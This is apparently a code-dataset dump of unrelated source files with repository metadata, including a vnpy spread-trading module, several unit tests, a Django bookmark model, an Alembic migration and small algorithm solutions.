[ "MIT" ]
null
null
null
vnpy/trader/app/spreadTrading/stBase.py
cmbclh/vnpy-1.7
ccca92139198a0d213c15fe531f37c1c702ee968
[ "MIT" ]
null
null
null
# encoding: UTF-8 from __future__ import division from datetime import datetime from math import floor import pandas as pd import numpy as np import sys sys.path.append('../') #sys.path.append('D:\\tr\\vnpy-master\\vn.trader\\DAO') sys.path.append('D:\\tr\\vnpy-1.7\\vnpy\\DAO') sys.path.append('D:\\tr\\vnpy-1.7\\vnpy\\common') import vnpy.DAO import vnpy.common from vnpy.DAO import * from vnpy.trader.vtConstant import (EMPTY_INT, EMPTY_FLOAT, EMPTY_STRING, EMPTY_UNICODE) EVENT_SPREADTRADING_TICK = 'eSpreadTradingTick.' EVENT_SPREADTRADING_POS = 'eSpreadTradingPos.' EVENT_SPREADTRADING_LOG = 'eSpreadTradingLog' EVENT_SPREADTRADING_ALGO = 'eSpreadTradingAlgo.' EVENT_SPREADTRADING_ALGOLOG = 'eSpreadTradingAlgoLog' ######################################################################## class StLeg(object): """""" #---------------------------------------------------------------------- def __init__(self): """Constructor""" self.vtSymbol = EMPTY_STRING # 代码 self.ratio = EMPTY_INT # 实际交易时的比例 self.multiplier = EMPTY_FLOAT # 计算价差时的乘数 self.payup = EMPTY_INT # 对冲时的超价tick self.bidPrice = EMPTY_FLOAT self.askPrice = EMPTY_FLOAT self.bidVolume = EMPTY_INT self.askVolume = EMPTY_INT self.longPos = EMPTY_INT self.shortPos = EMPTY_INT self.netPos = EMPTY_INT self.actleg = EMPTY_INT self.actlegPos = EMPTY_FLOAT self.passleg = EMPTY_INT self.passlegPos = EMPTY_FLOAT self.profitloss = EMPTY_FLOAT ######################################################################## class StSpread(object): """""" #---------------------------------------------------------------------- def __init__(self): """Constructor""" self.name = EMPTY_UNICODE # 名称 self.symbol = EMPTY_STRING # 代码(基于组成腿计算) self.activeLeg = None # 主动腿 self.passiveLegs = [] # 被动腿(支持多条) self.allLegs = [] # 所有腿 self.bidPrice = EMPTY_FLOAT self.askPrice = EMPTY_FLOAT self.bidVolume = EMPTY_INT self.askVolume = EMPTY_INT self.time = EMPTY_STRING self.longPos = EMPTY_INT self.shortPos = EMPTY_INT self.netPos = EMPTY_INT 
self.actlegLongPos = EMPTY_INT self.actlegLongValue = EMPTY_FLOAT self.actlegShortPos = EMPTY_INT self.actlegShortValue = EMPTY_FLOAT self.passlegLongPos = EMPTY_INT self.passlegLongValue = EMPTY_FLOAT self.passlegShortgPos = EMPTY_INT self.passlegShortValue = EMPTY_FLOAT self.profitloss = EMPTY_FLOAT #---------------------------------------------------------------------- def initSpread(self): """初始化价差""" # 价差最少要有一条主动腿 if not self.activeLeg: return # 生成所有腿列表 self.allLegs.append(self.activeLeg) self.allLegs.extend(self.passiveLegs) # 生成价差代码 legSymbolList = [] for leg in self.allLegs: if leg.multiplier >= 0: legSymbol = '+%s*%s' %(leg.multiplier, leg.vtSymbol) else: legSymbol = '%s*%s' %(leg.multiplier, leg.vtSymbol) legSymbolList.append(legSymbol) self.symbol = ''.join(legSymbolList) #---------------------------------------------------------------------- def calculatePrice(self): """计算价格""" # 清空价格和委托量数据 self.bidPrice = EMPTY_FLOAT self.askPrice = EMPTY_FLOAT self.askVolume = EMPTY_INT self.bidVolume = EMPTY_INT # 遍历价差腿列表 for n, leg in enumerate(self.allLegs): # 计算价格 if leg.multiplier > 0: self.bidPrice += leg.bidPrice * leg.multiplier self.askPrice += leg.askPrice * leg.multiplier else: self.bidPrice += leg.askPrice * leg.multiplier self.askPrice += leg.bidPrice * leg.multiplier # 计算报单量:floor向下取整 if leg.ratio > 0: legAdjustedBidVolume = floor(leg.bidVolume / leg.ratio) legAdjustedAskVolume = floor(leg.askVolume / leg.ratio) else: legAdjustedBidVolume = floor(leg.askVolume / abs(leg.ratio)) legAdjustedAskVolume = floor(leg.bidVolume / abs(leg.ratio)) if n == 0: self.bidVolume = legAdjustedBidVolume # 对于第一条腿,直接初始化 self.askVolume = legAdjustedAskVolume else: self.bidVolume = min(self.bidVolume, legAdjustedBidVolume) # 对于后续的腿,价差可交易报单量取较小值 self.askVolume = min(self.askVolume, legAdjustedAskVolume) # 更新时间 self.time = datetime.now().strftime('%H:%M:%S.%f')[:-3] #---------------------------------------------------------------------- def calculatePos(self): """计算持仓""" # 
清空持仓数据 self.longPos = EMPTY_INT self.shortPos = EMPTY_INT self.netPos = EMPTY_INT self.actlegLongPos = EMPTY_INT self.actlegLongValue = EMPTY_FLOAT self.actlegShortPos = EMPTY_INT self.actlegShortValue = EMPTY_FLOAT self.passlegLongPos = EMPTY_INT self.passlegLongValue = EMPTY_FLOAT self.passlegShortgPos = EMPTY_INT self.passlegShortValue = EMPTY_FLOAT self.profitloss = EMPTY_FLOAT # 遍历价差腿列表 for n, leg in enumerate(self.allLegs): if leg.ratio > 0: legAdjustedLongPos = floor(leg.longPos / leg.ratio) legAdjustedShortPos = floor(leg.shortPos / leg.ratio) else: legAdjustedLongPos = floor(leg.shortPos / abs(leg.ratio)) legAdjustedShortPos = floor(leg.longPos / abs(leg.ratio)) if n == 0: self.longPos = legAdjustedLongPos self.shortPos = legAdjustedShortPos else: self.longPos = min(self.longPos, legAdjustedLongPos) self.shortPos = min(self.shortPos, legAdjustedShortPos) #计算浮动盈亏 sql = ' SELECT LONG_POSITION, LONG_POSITION*LONG_OPEN_AVG_PRICE,SHORT_POSITION,SHORT_POSITION*SHORT_OPEN_AVG_PRICE' \ ' from defer_real_hold where SYMBOL = \'%s\' and STRATAGE = \'%s\' ' % (leg.vtSymbol, self.name) #retPos = vnpy.DAO.getDataBySQL('vnpy', sql) print (u'leginfo:vtSymbol=%s,name=%s' % (leg.vtSymbol, self.name)) retPos = vnpy.DAO.getDataBySQL('vnpy', sql) # 根据以上条件查询出的默认持仓只有一条记录,目前被动腿也只有一条leg print retPos print leg print self.activeLeg,self.passiveLegs if leg == self.activeLeg: print (u'leginfo:self.askPrice=%s' % (str(self.askPrice))) self.actlegLongPos = retPos.icol(0).get_values() self.actlegLongValue = retPos.icol(1).get_values() self.actlegShortPos = retPos.icol(2).get_values() self.actlegShortValue = retPos.icol(3).get_values() print self.actlegLongPos,self.actlegLongValue,self.actlegShortPos,self.actlegShortValue #被动腿有可能有多条腿 elif leg in self.passiveLegs: self.passlegLongPos += retPos.icol(0).get_values() self.passlegLongValue += retPos.icol(1).get_values() self.passlegShortgPos += retPos.icol(2).get_values() self.passlegShortValue += retPos.icol(3).get_values() else: pass 
#浮动盈亏=主动腿盈亏+被动腿盈亏 self.profitloss = (self.actlegLongValue - self.actlegLongPos * leg.askPrice ) + (self.passlegShortValue - self.passlegShortgPos * leg.bidPrice) \ + (self.actlegShortValue - self.actlegShortPos * leg.bidPrice) + ( self.passlegLongValue - self.passlegLongPos * leg.askPrice) #self.profitloss = self.actlegLongPos*self.askPrice + self.actlegShortPos*self.bidPrice print (u'leginfo:self.actleg=%s,self.actlegPos=%s,self.profitloss=%s' % (str(self.actlegLongPos), str(self.actlegLongValue),str(self.profitloss))) # 计算净仓位 self.longPos = int(self.longPos) self.shortPos = int(self.shortPos) self.netPos = self.longPos - self.shortPos #wzhua 20170917 新增计算浮动盈亏 self.actlegLongPos = int(self.actlegLongPos) self.actlegLongValue = float(self.actlegLongValue) self.actlegShortPos = int(self.actlegShortPos) self.actlegShortValue = float(self.actlegShortValue) self.passlegLongPos = int(self.passlegLongPos) self.passlegLongValue = float(self.passlegLongValue) self.passlegShortgPos = int(self.passlegShortgPos) self.passlegShortValue = float(self.passlegShortValue) self.profitloss = float(self.profitloss) #---------------------------------------------------------------------- def addActiveLeg(self, leg): """添加主动腿""" self.activeLeg = leg #---------------------------------------------------------------------- def addPassiveLeg(self, leg): """添加被动腿""" self.passiveLegs.append(leg)
37.270588
158
0.551557
865
9,504
5.947977
0.210405
0.040816
0.055977
0.008163
0.35724
0.29174
0.240816
0.219825
0.205831
0.196501
0
0.004161
0.291982
9,504
255
159
37.270588
0.76044
0.101957
0
0.333333
0
0
0.054882
0.032954
0
0
0
0
0
0
null
null
0.163636
0.060606
null
null
0.042424
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
1
0
0
0
0
0
2
abfe2c1cf99654791bb342078effa2478f34e393
310
py
Python
{{cookiecutter.project_slug}}/{{cookiecutter.project_slug}}/users/tests/test_models.py
nathfroech/cookiecutter-django
9568671807c24655d0c51ecef91d22fe8b550d3f
[ "BSD-3-Clause" ]
null
null
null
{{cookiecutter.project_slug}}/{{cookiecutter.project_slug}}/users/tests/test_models.py
nathfroech/cookiecutter-django
9568671807c24655d0c51ecef91d22fe8b550d3f
[ "BSD-3-Clause" ]
null
null
null
{{cookiecutter.project_slug}}/{{cookiecutter.project_slug}}/users/tests/test_models.py
nathfroech/cookiecutter-django
9568671807c24655d0c51ecef91d22fe8b550d3f
[ "BSD-3-Clause" ]
null
null
null
import pytest from hamcrest import assert_that, equal_to, is_ from django.conf import settings @pytest.mark.django_db def test_user_get_absolute_url(user: settings.AUTH_USER_MODEL): expected_url = '/users/{0}/'.format(user.username) assert_that(user.get_absolute_url(), is_(equal_to(expected_url)))
28.181818
69
0.790323
48
310
4.75
0.5625
0.087719
0.131579
0.157895
0
0
0
0
0
0
0
0.003597
0.103226
310
10
70
31
0.816547
0
0
0
0
0
0.035484
0
0
0
0
0
0.285714
1
0.142857
false
0
0.428571
0
0.571429
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
2
abffd96161e8443437fe3910d4ce59e8abc42d99
731
py
Python
tests/_test_version_greater.py
jonyboi396825/COM-Server
e4e8a1a5e9f86c1036ebb7ac3d39c20b63e7e905
[ "MIT" ]
4
2021-11-09T04:11:51.000Z
2022-01-30T01:03:16.000Z
tests/_test_version_greater.py
jonyboi396825/COM-Server
e4e8a1a5e9f86c1036ebb7ac3d39c20b63e7e905
[ "MIT" ]
55
2021-11-15T16:36:25.000Z
2022-03-10T04:48:08.000Z
tests/_test_version_greater.py
jonyboi396825/COM-Server
e4e8a1a5e9f86c1036ebb7ac3d39c20b63e7e905
[ "MIT" ]
1
2021-11-12T02:14:07.000Z
2021-11-12T02:14:07.000Z
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Version testing Don't want to run when running `pytest`, only run when something is pushed to develop branch or PR to master. """ import configparser import requests from com_server import __version__ from passive.cmp_version import Version def test_version_greater() -> None: """Tests if current version is greater than version on master branch on github""" req = requests.get( "https://raw.githubusercontent.com/jonyboi396825/COM-Server/master/setup.cfg" ) cfg = configparser.ConfigParser() cfg.read_string(req.text) master_vers = Version(cfg["metadata"]["version"]) cur_vers = Version(__version__) assert cur_vers > master_vers
23.580645
85
0.719562
99
731
5.141414
0.59596
0.027505
0
0
0
0
0
0
0
0
0
0.013267
0.175103
731
30
86
24.366667
0.830846
0.336525
0
0
0
0
0.191083
0
0
0
0
0
0.076923
1
0.076923
false
0.076923
0.307692
0
0.384615
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
1
0
0
0
0
2
2800fe4ff8f5543c36554bc37b647db2a125d9ae
390
py
Python
mp/visualize/models.py
Ecotrust/PEW-EFH
83e404fe90e957891ab2dfaad327e52346cea748
[ "Apache-2.0" ]
1
2017-09-06T14:05:48.000Z
2017-09-06T14:05:48.000Z
mp/visualize/models.py
Ecotrust/PEW-EFH
83e404fe90e957891ab2dfaad327e52346cea748
[ "Apache-2.0" ]
126
2015-01-05T19:47:52.000Z
2021-09-07T23:44:29.000Z
mp/visualize/models.py
Ecotrust/COMPASS
42ee113e4d66767300cfab0d6ce1f35847f447ed
[ "Apache-2.0" ]
null
null
null
from django.db import models from django.conf import settings from django.contrib.gis.db import models from madrona.features import register from madrona.features.models import Feature @register class Bookmark(Feature): url_hash = models.CharField(max_length=2050) class Options: verbose_name = 'Marine Planner Bookmark' form = 'visualize.forms.BookmarkForm'
27.857143
49
0.761538
50
390
5.88
0.6
0.102041
0.095238
0.122449
0
0
0
0
0
0
0
0.012384
0.171795
390
14
50
27.857143
0.897833
0
0
0
0
0
0.130435
0.071611
0
0
0
0
0
1
0
false
0
0.454545
0
0.727273
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
2
e608539fab23c3cf7080aa7205e16f057ed4a51c
2,132
py
Python
test/test_coloripy.py
ajshajib/coloripy
136bad593b3914a5c33dec069df8bf5a44a5815d
[ "MIT" ]
3
2020-06-14T13:12:33.000Z
2022-01-03T21:41:16.000Z
test/test_coloripy.py
ajshajib/coloripy
136bad593b3914a5c33dec069df8bf5a44a5815d
[ "MIT" ]
null
null
null
test/test_coloripy.py
ajshajib/coloripy
136bad593b3914a5c33dec069df8bf5a44a5815d
[ "MIT" ]
null
null
null
""" Tests for `coloripy` module. """ import numpy as np from math import isclose import coloripy as cp class TestColoripy(object): @classmethod def setup_class(cls): pass def test_skew_scale(self): modes = ['linear', 'square', 'cubic', 'power', 'sqrt'] vals = [0., 0.5, 1.] for mode, val in zip(modes, vals): assert isclose(cp.skew_scale(val, mode=mode), val) def test_get_cmap(self): standard = np.array([[0.23137255, 0.29803922, 0.75294118], [0.21960784, 0.41568627, 0.87058824], [0.23137255, 0.5372549, 0.97647059], [0.29019608, 0.65490196, 1.0627451 ], [0.39215686, 0.76862745, 1.12941176], [0.52941176, 0.87843137, 1.18039216], [0.67843137, 0.97647059, 1.20784314], [0.84313725, 1.0627451, 1.21568627], [1.00784314, 1.12941176, 1.21176471], [1.17254902, 1.17647059, 1.19607843], [1.32941176, 1.19607843, 1.17647059], [1.2745098 , 1.14901961, 1.03137255], [1.22745098, 1.0745098, 0.87843137], [1.18431373, 0.98431373, 0.7254902 ], [1.14117647, 0.87843137, 0.58431373], [1.09019608, 0.76078431, 0.45490196], [1.03137255, 0.63137255, 0.34901961], [0.96470588, 0.50196078, 0.26666667], [0.88627451, 0.36862745, 0.20784314], [0.8, 0.22745098, 0.17254902], [0.70588235, 0.01568627, 0.14901961]]) rgb1 = np.array([59, 76, 192]) rgb2 = np.array([180, 4, 38]) ref_point = [221., 221., 221.] cmap = cp.MshColorMap(rgb1, rgb2, ref_point=ref_point, num_bins=21).get_colormap() assert isclose(np.sum(cmap-standard), 0., abs_tol=1e-8) @classmethod def teardown_class(cls): pass
38.071429
66
0.486867
239
2,132
4.288703
0.476987
0.020488
0.023415
0
0
0
0
0
0
0
0
0.445537
0.379925
2,132
55
67
38.763636
0.329803
0.013133
0
0.093023
0
0
0.012405
0
0
0
0
0
0.046512
1
0.093023
false
0.046512
0.069767
0
0.186047
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
1
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
e62704d640c5f34b51dc4894e557ad6bcb2ec7d5
1,637
py
Python
ad_hoc/name_mapper_backfill.py
Connor-R/NSBL
16615990d058d171fab4790f937846fd1f0b2ee9
[ "MIT" ]
1
2020-11-19T23:20:19.000Z
2020-11-19T23:20:19.000Z
ad_hoc/name_mapper_backfill.py
Connor-R/NSBL
16615990d058d171fab4790f937846fd1f0b2ee9
[ "MIT" ]
null
null
null
ad_hoc/name_mapper_backfill.py
Connor-R/NSBL
16615990d058d171fab4790f937846fd1f0b2ee9
[ "MIT" ]
null
null
null
from py_db import db import NSBL_helpers as helper db = db("NSBL") table_dict = {"register_batting_analytical": "a.player_name" , "register_batting_primary": "a.player_name" , "register_batting_secondary": "a.player_name" , "register_batting_splits": "a.player_name" , "register_pitching_analytical": "a.player_name" , "register_pitching_primary": "a.player_name" , "register_pitching_rates_relief": "a.player_name" , "register_pitching_rates_start": "a.player_name" , "register_pitching_secondary": "a.player_name" , "zips_defense": "a.player_name" , "zips_fangraphs_batters_counting": "a.Player" , "zips_fangraphs_batters_rate": "a.Player" , "zips_fangraphs_pitchers_counting": "a.Player" , "zips_fangraphs_pitchers_rate": "a.Player" , "zips_offense": "a.player_name" , "zips_offense_splits": "a.player_name" , "zips_pitching": "a.player_name" , "zips_pitching_splits": "a.player_name" , "mlb_prospects.fg_raw": "a.playerName" , "mlb_prospects.minorleagueball_professional": "a.full_name" , "mlb_prospects.mlb_prospects_draft": "CONCAT(a.fname, ' ', a.lname)" , "mlb_prospects.mlb_prospects_international": "CONCAT(a.fname, ' ', a.lname)" , "mlb_prospects.mlb_prospects_professional": "CONCAT(a.fname, ' ', a.lname)" } for k,v in table_dict.items(): print k qry = """ SELECT DISTINCT %s FROM %s a LEFT JOIN name_mapper nm ON (%s = nm.wrong_name) WHERE 1 AND nm.wrong_name IS NULL """ % (v, k, v) # raw_input(qry) names = db.query(qry) for name in names: helper.input_name(name[0])
32.098039
82
0.681735
218
1,637
4.770642
0.316514
0.121154
0.148077
0.146154
0.477885
0.142308
0.080769
0.080769
0.080769
0
0
0.001484
0.176542
1,637
50
83
32.74
0.77003
0.008552
0
0
0
0
0.665022
0.316471
0
0
0
0
0
0
null
null
0
0.051282
null
null
0.025641
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
2
e62dd8453d35731f8df986056643c1efd1e8ea57
1,257
py
Python
py/py_0105_special_subset_sums_testing.py
lcsm29/project-euler
fab794ece5aa7a11fc7c2177f26250f40a5b1447
[ "MIT" ]
null
null
null
py/py_0105_special_subset_sums_testing.py
lcsm29/project-euler
fab794ece5aa7a11fc7c2177f26250f40a5b1447
[ "MIT" ]
null
null
null
py/py_0105_special_subset_sums_testing.py
lcsm29/project-euler
fab794ece5aa7a11fc7c2177f26250f40a5b1447
[ "MIT" ]
null
null
null
# Solution of; # Project Euler Problem 105: Special subset sums: testing # https://projecteuler.net/problem=105 # # Let S(A) represent the sum of elements in set A of size n. # We shall call it a special sum set if for any two non-empty disjoint # subsets, B and C, the following properties are true: # # S(B) ≠ S(C); that is, sums of subsets cannot be equal. # If B contains more elements than C then S(B) > S(C). # For example, {81, 88, 75, 42, 87, 84, 86, 65} is not a special sum set # because 65 + 87 + 88 = 75 + 81 + 84, whereas # {157, 150, 164, 119, 79, 159, 161, 139, 158} satisfies both rules # for all possible subset pair combinations and S(A) = 1286. # # Using sets.txt (right click and "Save Link/Target As..."), a 4K text file # with one-hundred sets containing seven to twelve elements # (the two examples given above are the first two sets in the file), # identify all the special sum sets, A1, A2, ..., Ak, # and find the value of S(A1) + S(A2) + ... + S(Ak). # NOTE: This problem is related to Problem 103 and Problem 106. # # by lcsm29 http://github.com/lcsm29/project-euler import timed def dummy(n): pass if __name__ == '__main__': n = 1000 i = 10000 prob_id = 102 timed.caller(dummy, n, i, prob_id)
34.916667
76
0.67144
222
1,257
3.761261
0.608108
0.035928
0.026347
0.033533
0
0
0
0
0
0
0
0.092105
0.214002
1,257
35
77
35.914286
0.752024
0.842482
0
0
0
0
0.045977
0
0
0
0
0
0
1
0.125
false
0.125
0.125
0
0.25
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
2
e62e5420e9280590cadcb41f39f8b617ff3cad05
3,673
py
Python
pyserver/item/attc/annotation.py
lbouma/Cyclopath
d09d927a1e6f9e07924007fd39e8e807cd9c0f8c
[ "Apache-2.0" ]
15
2015-05-06T05:11:48.000Z
2021-12-03T14:56:58.000Z
pyserver/item/attc/annotation.py
landonb/Cyclopath
d09d927a1e6f9e07924007fd39e8e807cd9c0f8c
[ "Apache-2.0" ]
null
null
null
pyserver/item/attc/annotation.py
landonb/Cyclopath
d09d927a1e6f9e07924007fd39e8e807cd9c0f8c
[ "Apache-2.0" ]
8
2015-05-06T05:11:36.000Z
2020-11-04T05:11:22.000Z
# Copyright (c) 2006-2013 Regents of the University of Minnesota. # For licensing terms, see the file LICENSE. import conf import g from item import attachment from item import item_base from item import item_versioned from item.util.item_type import Item_Type from util_.streetaddress import ccp_stop_words log = g.log.getLogger('annotation') class One(attachment.One): item_type_id = Item_Type.ANNOTATION item_type_table = 'annotation' item_gwis_abbrev = 'anno' child_item_types = None local_defns = [ # py/psql name, deft, send?, pkey?, pytyp, reqv ('comments', None, True, False, str, 2), ] attr_defns = attachment.One.attr_defns + local_defns psql_defns = attachment.One.psql_defns + local_defns gwis_defns = item_base.One.attr_defns_reduce_for_gwis(attr_defns) __slots__ = [] + [attr_defn[0] for attr_defn in local_defns] # *** Constructor def __init__(self, qb=None, row=None, req=None, copy_from=None): g.assurt(copy_from is None) # Not supported for this class. attachment.One.__init__(self, qb, row, req, copy_from) # *** Saving to the Database # def save_core(self, qb): attachment.One.save_core(self, qb) # Save to the 'annotation' table. self.save_insert(qb, One.item_type_table, One.psql_defns) # *** class Many(attachment.Many): one_class = One __slots__ = () sql_clauses_cols_all = attachment.Many.sql_clauses_cols_all.clone() # FIXME: Maybe call a fcn. instead, like opt/argparse? Or does that # just complicate things more? 
#sqlc_all.inner.select_list("annot.comments") sql_clauses_cols_all.inner.shared += ( """ , annot.comments """ ) sql_clauses_cols_all.inner.join += ( """ JOIN annotation AS annot ON (gia.item_id = annot.system_id) """ ) sql_clauses_cols_all.outer.shared += ( """ , group_item.comments """ ) # *** Constructor def __init__(self): attachment.Many.__init__(self) # *** Query Builder routines # FIXME [aa] Only get gf's whose username = '' or = [current_user] # FIXME [aa] Security leak -- private annotations being sent to client # 2012.04.02: Is this really still true?? # FIXME Send where feat_type != and append feat_type == region_watched # FIXME [aa] Bug: Deleted and old version attachments being sent for no-diff # Is this a regression, or have annots always been fetches this way? # SELECT DISTINCT # lhs_stack_id AS id, # version, # comments # FROM annotation_geo AS ag # WHERE (ST_Intersects(ag.geometry, # ST_SetSRID('BOX(479932.800000 4978592.800000, # 482124.800000 4981408.800000)'::box2d, # 26915))) # def sql_apply_query_filters(self, qb, where_clause="", conjunction=""): g.assurt((not where_clause) and (not conjunction)) g.assurt((not conjunction) or (conjunction == "AND")) where_clause = attachment.Many.sql_apply_query_filters( self, qb, where_clause, conjunction) return where_clause # def sql_apply_query_filter_by_text(self, qb, table_cols, stop_words, use_outer=False): table_cols.insert(0, 'annot.comments') stop_words = ccp_stop_words.Addy_Stop_Words__Annotation return attachment.Many.sql_apply_query_filter_by_text( self, qb, table_cols, stop_words, use_outer) # *** # ***
30.355372
79
0.632181
468
3,673
4.681624
0.401709
0.021908
0.031949
0.038795
0.140575
0.127796
0.127796
0.095847
0.095847
0.052031
0
0.027975
0.270079
3,673
120
80
30.608333
0.789258
0.342499
0
0
0
0
0.022122
0
0
0
0
0.016667
0
1
0.1
false
0
0.14
0
0.56
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
1
0
0
2
e64d35a8b39dc13cbd44e4267a4f6d20a1f20bd8
746
py
Python
games/stock/environment.py
hkp1030/muzero-stock
d3acddf11afa523b81bbe1a626a50c95eb78c165
[ "MIT" ]
1
2022-01-21T21:15:49.000Z
2022-01-21T21:15:49.000Z
games/stock/environment.py
hkp1030/muzero-stock
d3acddf11afa523b81bbe1a626a50c95eb78c165
[ "MIT" ]
null
null
null
games/stock/environment.py
hkp1030/muzero-stock
d3acddf11afa523b81bbe1a626a50c95eb78c165
[ "MIT" ]
1
2022-01-21T21:30:37.000Z
2022-01-21T21:30:37.000Z
class Environment: PRICE_IDX = 4 # 종가의 위치 def __init__(self, chart_data=None, training_data=None): self.chart_data = chart_data self.training_data = training_data self.observation = None self.idx = -1 def reset(self): self.observation = None self.idx = -1 def is_done(self): if self.idx + 1 >= len(self.training_data): return True else: return False def observe(self): if self.is_done(): return None self.idx += 1 self.observation = self.training_data.iloc[self.idx] return self.observation.tolist() def get_price(self): return self.chart_data.iloc[self.idx][self.PRICE_IDX]
24.866667
61
0.591153
96
746
4.40625
0.302083
0.099291
0.07565
0.085106
0.141844
0.141844
0.141844
0
0
0
0
0.009766
0.313673
746
29
62
25.724138
0.816406
0.008043
0
0.173913
0
0
0
0
0
0
0
0
0
1
0.217391
false
0
0
0.043478
0.521739
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
1
0
0
2
e651cc7d2f10c7d86c7ce7b411ef45695942e02f
1,320
py
Python
tests/test_utils.py
SalemHarrache/dbcut
0fd60e15f3b5532c5c531923d2e9ef08ce17c935
[ "MIT" ]
16
2019-11-22T16:36:56.000Z
2022-03-12T01:49:03.000Z
tests/test_utils.py
SalemHarrache/dbcut
0fd60e15f3b5532c5c531923d2e9ef08ce17c935
[ "MIT" ]
3
2019-11-23T06:11:30.000Z
2020-06-23T13:34:04.000Z
tests/test_utils.py
SalemHarrache/dbcut
0fd60e15f3b5532c5c531923d2e9ef08ce17c935
[ "MIT" ]
4
2019-11-22T20:42:57.000Z
2022-02-23T09:10:00.000Z
import unittest from collections import OrderedDict from dbcut.utils import sorted_nested_dict def test_simple_dict_is_sorted(): data = { "c": 1, "a": 2, "b": 3, } expected = OrderedDict([("a", 2), ("b", 3), ("c", 1)]) assert expected == sorted_nested_dict(data) def test_nested_iterables_are_sorted(): data = { "c": [1, 3, 2], "a": 2, "b": (3, 1, 2), } expected = OrderedDict( [ ("a", 2), # The tuple is transformed into a list here. Still an iterable though. ("b", [1, 2, 3]), ("c", [1, 2, 3]), ] ) assert expected == sorted_nested_dict(data) def test_nested_dicts_are_sorted(): data = { "c": 1, "a": {"b": 1, "a": 2}, "b": 3, } expected = OrderedDict( [("a", OrderedDict([("a", 2), ("b", 1)])), ("b", 3), ("c", 1)] ) assert expected == sorted_nested_dict(data) def test_non_dicts_are_untouched(): data = "ravioli" assert data is sorted_nested_dict(data) data = ["r", "a", "v", "i", "o", "l", "i"] assert data is sorted_nested_dict(data) data = 42 assert data is sorted_nested_dict(data) class Custom: pass data = Custom() assert data is sorted_nested_dict(data)
22.372881
82
0.524242
172
1,320
3.837209
0.27907
0.145455
0.193939
0.212121
0.562121
0.498485
0.498485
0.401515
0.216667
0.136364
0
0.032931
0.309848
1,320
58
83
22.758621
0.691548
0.051515
0
0.391304
0
0
0.0288
0
0
0
0
0
0.152174
1
0.086957
false
0.021739
0.065217
0
0.173913
0
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
e66228a86c2396ec8a63b8d48e9ca8a5edd9c594
502
py
Python
migrations/versions/1d09e9261d5_.py
mainulhossain/biowl
039adc96539fae25843b1fc36074a4e5e55830ec
[ "MIT" ]
null
null
null
migrations/versions/1d09e9261d5_.py
mainulhossain/biowl
039adc96539fae25843b1fc36074a4e5e55830ec
[ "MIT" ]
null
null
null
migrations/versions/1d09e9261d5_.py
mainulhossain/biowl
039adc96539fae25843b1fc36074a4e5e55830ec
[ "MIT" ]
1
2020-01-05T10:47:21.000Z
2020-01-05T10:47:21.000Z
"""empty message Revision ID: 1d09e9261d5 Revises: 40d93619b7d Create Date: 2016-12-16 11:38:41.336859 """ # revision identifiers, used by Alembic. revision = '1d09e9261d5' down_revision = '40d93619b7d' from alembic import op import sqlalchemy as sa def upgrade(): ### commands auto generated by Alembic - please adjust! ### pass ### end Alembic commands ### def downgrade(): ### commands auto generated by Alembic - please adjust! ### pass ### end Alembic commands ###
18.592593
63
0.687251
60
502
5.733333
0.616667
0.078488
0.122093
0.133721
0.372093
0.372093
0.372093
0.372093
0.372093
0.372093
0
0.129353
0.199203
502
26
64
19.307692
0.726368
0.575697
0
0.25
0
0
0.122222
0
0
0
0
0
0
1
0.25
false
0.25
0.25
0
0.5
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
1
0
0
0
0
0
2
e669828a1fd8d946f628655596de52579956c2b4
442
py
Python
Leetcode/560-Subarray_Sum.py
EdwaRen/Competitve-Programming
e8bffeb457936d28c75ecfefb5a1f316c15a9b6c
[ "MIT" ]
1
2021-05-03T21:48:25.000Z
2021-05-03T21:48:25.000Z
Leetcode/560-Subarray_Sum.py
EdwaRen/Competitve_Programming
e8bffeb457936d28c75ecfefb5a1f316c15a9b6c
[ "MIT" ]
null
null
null
Leetcode/560-Subarray_Sum.py
EdwaRen/Competitve_Programming
e8bffeb457936d28c75ecfefb5a1f316c15a9b6c
[ "MIT" ]
null
null
null
class Solution(object): def subarraySum(self, nums, k): sum = 0 res = 0 sum_history = {0:1} for i in nums: sum+=i if sum - k in sum_history: res+=sum_history[sum-k] if sum in sum_history: sum_history[sum]+=1 else: sum_history[sum] = 1 return res a = Solution() print(a.subarraySum([1, 2, 1, 2], 3))
22.1
39
0.466063
59
442
3.389831
0.389831
0.3
0.26
0.14
0
0
0
0
0
0
0
0.043478
0.427602
442
19
40
23.263158
0.747036
0
0
0
0
0
0
0
0
0
0
0
0
1
0.0625
false
0
0
0
0.1875
0.0625
0
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
0501d436e365fc40c731e765ab901eb50645cb02
1,489
py
Python
main.py
ytyaru/Hatena.WebSite.Login.201703040757
11ffc5549398478146a9966189e06cf535b34092
[ "CC0-1.0" ]
null
null
null
